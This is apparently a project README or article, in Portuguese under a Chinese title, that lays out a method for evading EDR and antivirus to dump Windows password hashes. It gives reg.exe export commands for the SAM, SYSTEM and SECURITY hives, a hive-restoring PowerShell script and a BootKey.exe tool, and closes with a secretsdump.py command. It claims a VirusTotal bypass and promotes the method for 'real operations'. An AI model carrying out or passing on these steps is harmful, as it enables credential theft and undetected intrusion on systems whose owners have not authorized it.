
Windows绕过EDR实现DumpHash
Através da aplicação estendida do programa legítimo do sistema Reg.exe, contornamos habilmente o ponto de interceptação dos antivírus, alcançando o objetivo de contornar o EDR para realizar o DumpHash.
Com base em testes reais, este método é eficaz contra sistemas da série Windows, tem baixa dificuldade de operação e possui valor para uso em operações reais.
Artigos sobre aplicação prática deste projeto:
Após a publicação do artigo, não encontramos a mesma abordagem em comunidades nacionais e estrangeiras, e pensamos que fosse uma estreia mundial. Posteriormente, com base nos comentários dos fãs, descobrimos que essa abordagem já havia sido compartilhada anteriormente por um especialista no exterior: Dumping LSA secrets: a story about task decorrelation
O código-fonte e os Releases deste artigo já foram publicados no GitHub. Compartilhar não é fácil; se você achar útil, pode dar um Star. Muito obrigado!
Na máquina de destino, execute o comando para exportar o arquivo .reg
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg
Baixe o arquivo .reg da primeira etapa para a máquina local e execute o script PowerShell RegReduction.ps1 deste projeto na máquina local para restaurar os arquivos binários.
.\RegReduction.ps1
Observação: após baixar o script do GitHub, a codificação padrão é UTF-8; é necessário alterá-la para ANSI (GB2312) usando o Bloco de Notas para que o script seja executado corretamente.

Na máquina de destino, execute o executável BootKey.exe; o código-fonte é o arquivo BootKey.c deste projeto.
BootKey.exe

Teste de bypass de antivírus (2026.5.10): www.virustotal.com

python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

Este artigo envolve várias operações importantes; os passos centrais na máquina de destino são apenas dois:
reg.exe export para exportar o conteúdo crítico do registro;BootKey.exe para exportar a BootKey do sistema.Também foram realizados testes em diferentes sistemas, com os seguintes resultados:
reg.exe export para exportar o registro requer privilégios de SYSTEM; já em ambientes Windows Server 2022 e inferiores, o uso do comando reg.exe export para exportar o registro requer apenas privilégios de administrador comum (sem necessidade de privilégios de SYSTEM). Se o arquivo exportado pelo comando reg.exe export tiver apenas 1KB, isso indica que as permissões são insuficientes.BootKey.exe para exportar a BootKey não requer privilégios de administrador e, na prática, a maioria dos antivírus (todos os encontrados até agora) não o detecta.